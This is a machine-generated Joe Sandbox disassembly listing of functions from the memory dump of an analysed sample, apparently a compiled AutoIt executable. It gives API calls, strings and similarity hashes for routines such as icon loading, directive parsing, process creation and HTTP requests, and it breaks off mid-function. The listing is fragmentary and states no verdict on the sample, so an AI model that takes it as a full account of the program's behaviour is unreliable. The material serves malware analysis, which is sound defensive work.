Uniqueness Score: -1.00%

Function 002A833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002A835A
_wcslen.LIBCMT ref: 002A836E
_wcslen.LIBCMT ref: 002A8391
_wcslen.LIBCMT ref: 002A83B4
LoadImageW.USER32 ref: 002A83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002A5BF2), ref: 002A844E
LoadImageW.USER32 ref: 002A8487
LoadImageW.USER32 ref: 002A84CA
LoadImageW.USER32 ref: 002A8501
FreeLibrary.KERNEL32(?), ref: 002A850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002A851D
DestroyIcon.USER32(?,?,?,?,?,002A5BF2), ref: 002A852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002A8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002A8555

Strings

.exe, xrefs: 002A8388
.dll, xrefs: 002A83AB
.icl, xrefs: 002A8368

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: ccc58cbbd4a7c0ee9c3a70181e651254ef74c5bbd1a978f56eeb0da2178355b3
Instruction ID: 08a0999c315db1da34758f70c8079a1b1e0c529c64eefaa7673a2a1a77a94d77
Opcode Fuzzy Hash: ccc58cbbd4a7c0ee9c3a70181e651254ef74c5bbd1a978f56eeb0da2178355b3
Instruction Fuzzy Hash: CB61F171920206BFEB14DF64DC45BBE77A8BB09720F20454AF815D60D0EF74A9A0CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00217778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-end, xrefs: 002178D9
Cannot parse #include, xrefs: 00255279
#include-once, xrefs: 0021782F
#OnAutoItStartRegister, xrefs: 00217817
#ce, xrefs: 002178ED
#requireadmin, xrefs: 002177FF
#comments-start, xrefs: 0021785F, 002178B1
Bad directive syntax error, xrefs: 0025519A
#pragma compile, xrefs: 002177D3
#include, xrefs: 00217847
', xrefs: 00255169
#notrayicon, xrefs: 002177E7
Unterminated group of comments, xrefs: 0025528C
#cs, xrefs: 00217873, 002178C5
", xrefs: 00255153

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: e4a3e41fe95490767cd56aab0f8dc5462d54b6fc85b9292b7ffb89972c1235b0
Instruction ID: 8bb385504df6c2d408d60d681070677c86e20679b17567812f58cf1bada41b7d
Opcode Fuzzy Hash: e4a3e41fe95490767cd56aab0f8dc5462d54b6fc85b9292b7ffb89972c1235b0
Instruction Fuzzy Hash: 1A811AB1634616BBDB20AF60DC52FEE77B8AF65300F044025FC05AA192EB70D9B5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 002730F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0027318D
_wcslen.LIBCMT ref: 002731F8

Strings

CLASS, xrefs: 00273188, 002731A5
INSTANCE, xrefs: 00273453
TEXT, xrefs: 0027347C
CLASSNN, xrefs: 002731F3, 00273204
NAME, xrefs: 00273335, 00273346
REGEXPCLASS, xrefs: 00273255, 00273266
[-, xrefs: 0027339A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[-
API String ID: 176396367-2782989067
Opcode ID: a8d03c097fa8f9dcacd1aaacb39fe9e46ef6c5d46d34acde549e0aba1448760d
Instruction ID: 0057a52ae77a3b08bd53fb1b0b938f817a95becdb1dcd3611180b804383d141b
Opcode Fuzzy Hash: a8d03c097fa8f9dcacd1aaacb39fe9e46ef6c5d46d34acde549e0aba1448760d
Instruction Fuzzy Hash: 7FE11832A20527ABCB18DF74C4517EEBBB4BF14710F54C11AE45AE7240DB70AEA5ABD0

Uniqueness

Uniqueness Score: -1.00%

Function 002300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002300C6

Part of subcall function 002300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(002E070C,00000FA0,3EA15085,?,?,?,?,002523B3,000000FF), ref: 0023011C
Part of subcall function 002300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002523B3,000000FF), ref: 00230127
Part of subcall function 002300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002523B3,000000FF), ref: 00230138
Part of subcall function 002300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,002523B3,000000FF), ref: 0023014E
Part of subcall function 002300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,002523B3,000000FF), ref: 0023015C
Part of subcall function 002300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,002523B3,000000FF), ref: 0023016A
Part of subcall function 002300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00230195
Part of subcall function 002300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002301A0

___scrt_fastfail.LIBCMT ref: 002300E7

Part of subcall function 002300A3: __onexit.LIBCMT ref: 002300A9

Strings

WakeAllConditionVariable, xrefs: 00230162
kernel32.dll, xrefs: 00230133
InitializeConditionVariable, xrefs: 00230148
SleepConditionVariableCS, xrefs: 00230154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00230122

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: fa0e87ac4a6c13fe6964c6287df77e391b5cefd33a6fadea6da58a9dd9963dce
Instruction ID: 650d5c7266ae241d57b9e084f0d562d3f387c9220813e87e9eba07d307de1cb3
Opcode Fuzzy Hash: fa0e87ac4a6c13fe6964c6287df77e391b5cefd33a6fadea6da58a9dd9963dce
Instruction Fuzzy Hash: 4F2129B2A60711AFD7216FE4BD9DB2A73A4DB07F51F100136F809A6291DFB49C108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 002844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000), ref: 00284527
_wcslen.LIBCMT ref: 0028453B
_wcslen.LIBCMT ref: 00284599
_wcslen.LIBCMT ref: 002845F4
_wcslen.LIBCMT ref: 0028463F
_wcslen.LIBCMT ref: 002846A7

Part of subcall function 0022F9F2: _wcslen.LIBCMT ref: 0022F9FD

GetDriveTypeW.KERNEL32(?,002D6BF0,00000061), ref: 00284743

Strings

unknown, xrefs: 00284708
fixed, xrefs: 00284635, 0028463A
removable, xrefs: 002845EA, 002845EF
cdrom, xrefs: 0028458F, 00284594
ramdisk, xrefs: 002846F1
all, xrefs: 00284531, 00284536
network, xrefs: 0028469D, 002846A2

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 38a0523525d179e4d43406b31e58583d5652806f25065c2a5d50d90eb8e5ca29
Instruction ID: 397e21eace12467cf7cec3e3302f5e48e11789c1abc417bb34b584191b253efa
Opcode Fuzzy Hash: 38a0523525d179e4d43406b31e58583d5652806f25065c2a5d50d90eb8e5ca29
Instruction Fuzzy Hash: D7B1E2396293139BC710FF28C890A6EB7E5AFA5724F50491DF496C72D1E730E8A4CB52

Uniqueness

Uniqueness Score: -1.00%

Function 002A911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2

DragQueryPoint.SHELL32(?,?), ref: 002A9147

Part of subcall function 002A7674: ClientToScreen.USER32(?,?), ref: 002A769A
Part of subcall function 002A7674: GetWindowRect.USER32(?,?), ref: 002A7710
Part of subcall function 002A7674: PtInRect.USER32(?,?,002A8B89), ref: 002A7720

SendMessageW.USER32(?,000000B0,?,?), ref: 002A91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002A91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002A91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 002A9225
SendMessageW.USER32(?,000000B0,?,?), ref: 002A923E
SendMessageW.USER32(?,000000B1,?,?), ref: 002A9255
SendMessageW.USER32(?,000000B1,?,?), ref: 002A9277
DragFinish.SHELL32(?), ref: 002A927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002A9371

Strings

@GUI_DRAGFILE, xrefs: 002A9320
@GUI_DROPID, xrefs: 002A929E
@GUI_DRAGID, xrefs: 002A92E9
p#., xrefs: 002A92BB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#.
API String ID: 221274066-2896109970
Opcode ID: 5afe16ada1c67c4d2da95db5202d950a541a0656af9a0159232ba9451bd466f4
Instruction ID: 43e7a5fdc3afe843aa3625655be0f2be8a1f476594546150be3b29169ed35d74
Opcode Fuzzy Hash: 5afe16ada1c67c4d2da95db5202d950a541a0656af9a0159232ba9451bd466f4
Instruction Fuzzy Hash: 2561AD71118301AFC704DF50DC89DAFBBE8EF9A750F10092EF595921A1DB309AA9CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0029AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0029B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0029B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0029B1D4
_wcslen.LIBCMT ref: 0029B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0029B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0029B236
_wcslen.LIBCMT ref: 0029B332

Part of subcall function 002805A7: GetStdHandle.KERNEL32(000000F6), ref: 002805C6

_wcslen.LIBCMT ref: 0029B34B
_wcslen.LIBCMT ref: 0029B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0029B3B6
GetLastError.KERNEL32(00000000), ref: 0029B407
CloseHandle.KERNEL32(?), ref: 0029B439
CloseHandle.KERNEL32(00000000), ref: 0029B44A
CloseHandle.KERNEL32(00000000), ref: 0029B45C
CloseHandle.KERNEL32(00000000), ref: 0029B46E
CloseHandle.KERNEL32(?), ref: 0029B4E3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: a7de3a3173ae450139d8f2daa386e6f13083dfb20c28358c2389e4f60cf156cb
Instruction ID: 324effe7ccc403362b01b2e6b38f347f7ed58c57cc297531a4ce008427428db0
Opcode Fuzzy Hash: a7de3a3173ae450139d8f2daa386e6f13083dfb20c28358c2389e4f60cf156cb
Instruction Fuzzy Hash: 3EF1BE316243419FCB15EF24D991B6EBBE5AF85310F14845DF8898B2A2DB31EC64CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0021326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(002E1990), ref: 00252F8D
GetMenuItemCount.USER32(002E1990), ref: 0025303D
GetCursorPos.USER32(?), ref: 00253081
SetForegroundWindow.USER32(00000000), ref: 0025308A
TrackPopupMenuEx.USER32 ref: 0025309D
PostMessageW.USER32 ref: 002530A9

Strings

0, xrefs: 0021327D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 82546cb22d0314a94c2ea2469dcb73a733bc73fc8c0120caee75546fb20f7be5
Instruction ID: 747551c488b771fbf0bed2cf8c2990110014b0351d9ebe2ef30ef0927cf037a1
Opcode Fuzzy Hash: 82546cb22d0314a94c2ea2469dcb73a733bc73fc8c0120caee75546fb20f7be5
Instruction Fuzzy Hash: 5171F670664206BFEB21DF24DC49F9ABFA5FF02364F204216F915661D0C7B1AD68CB54

Uniqueness

Uniqueness Score: -1.00%

Function 002A6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 002A6DEB

Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A

CreateWindowExW.USER32 ref: 002A6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002A6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002A6E94
DestroyWindow.USER32 ref: 002A6EB5
CreateWindowExW.USER32 ref: 002A6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002A6EFD
GetDesktopWindow.USER32 ref: 002A6F16
GetWindowRect.USER32(00000000), ref: 002A6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002A6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002A6F4D

Part of subcall function 00229944: GetWindowLongW.USER32(?,000000EB), ref: 00229952

Strings

tooltips_class32, xrefs: 002A6E58, 002A6EDD
0, xrefs: 002A6D98

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 69f154183a6bbb63fd1ac22ae6ab45ba0f76b49be54f78814564d4b982303431
Instruction ID: 940f4628625e9d6c068c69b799d4ca50cfef78d90aa17f476df5d2c427c8cbfa
Opcode Fuzzy Hash: 69f154183a6bbb63fd1ac22ae6ab45ba0f76b49be54f78814564d4b982303431
Instruction Fuzzy Hash: 5E717A70154245AFDB25CF18EC48FAABBE9FB8A704F18041DF999C72A1CB70A965CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0028C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0028C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0028C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0028C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0028C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0028C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0028C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0028C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0028C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0028C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0028C5F0
InternetCloseHandle.WININET(00000000), ref: 0028C5FB

Strings

, xrefs: 0028C575

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 6b930c949d92825ea1014823eb115156774a3fe86c6d1220cc4305bfff42fd79
Instruction ID: 1da63c4212332422591b74ff5d8e0d8ed97db875fa0324c9c5e34415ac61f9c5
Opcode Fuzzy Hash: 6b930c949d92825ea1014823eb115156774a3fe86c6d1220cc4305bfff42fd79
Instruction Fuzzy Hash: 4B518DB4111205BFDB21AF60DD48AAB7BFCFF09354F20441AF945A6690DB34E9549B70

Uniqueness

Uniqueness Score: -1.00%

Function 002A856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 002A8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002A85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002A85AD
CloseHandle.KERNEL32(00000000), ref: 002A85BA
GlobalLock.KERNEL32 ref: 002A85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002A85D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002A85E0
CloseHandle.KERNEL32(00000000), ref: 002A85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 002A85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,002AFC38,?), ref: 002A8611
GlobalFree.KERNEL32(00000000), ref: 002A8621
GetObjectW.GDI32(?,00000018,?), ref: 002A8641
CopyImage.USER32 ref: 002A8671
DeleteObject.GDI32(?), ref: 002A8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002A86AF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 7b3ad6e432c2a4a18c19344ed5e24507156edafecc9868ffd2d8a05df8015821
Instruction ID: 26bcb3858562aaa66f9513b03acbf8916c2b3ebda65f9301a71187a12694e2ba
Opcode Fuzzy Hash: 7b3ad6e432c2a4a18c19344ed5e24507156edafecc9868ffd2d8a05df8015821
Instruction Fuzzy Hash: 0F41E675600209AFDB119FA5DC4CEAA7BBCEB8AB11F244059F909E7260DF709911CB60

Uniqueness

Uniqueness Score: -1.00%

Function 002814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00281502
VariantCopy.OLEAUT32(?,?), ref: 0028150B
VariantClear.OLEAUT32(?), ref: 00281517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002815FB
VarR8FromDec.OLEAUT32(?,?), ref: 00281657
VariantInit.OLEAUT32(?), ref: 00281708
SysFreeString.OLEAUT32(?), ref: 0028178C
VariantClear.OLEAUT32(?), ref: 002817D8
VariantClear.OLEAUT32(?), ref: 002817E7
VariantInit.OLEAUT32(00000000), ref: 00281823

Strings

Default, xrefs: 002816AF
%4d%02d%02d%02d%02d%02d, xrefs: 00281625

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 72e88432130227a9c9e36638e6ec34a604ed190f2ddeae3065da253e7dd1f814
Instruction ID: a16ab7a19080fab41a03e38465f35426b62feb623462d7b6335a588a275393f9
Opcode Fuzzy Hash: 72e88432130227a9c9e36638e6ec34a604ed190f2ddeae3065da253e7dd1f814
Instruction Fuzzy Hash: CBD12336A21111EBDB10AF64E884B7DB7B9BF46700F64806AF446AB1C0DB74EC72DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

Part of subcall function 0029C998: CharUpperBuffW.USER32(?,?), ref: 0029C9B5
Part of subcall function 0029C998: _wcslen.LIBCMT ref: 0029C9F1
Part of subcall function 0029C998: _wcslen.LIBCMT ref: 0029CA68
Part of subcall function 0029C998: _wcslen.LIBCMT ref: 0029CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0029B6F4
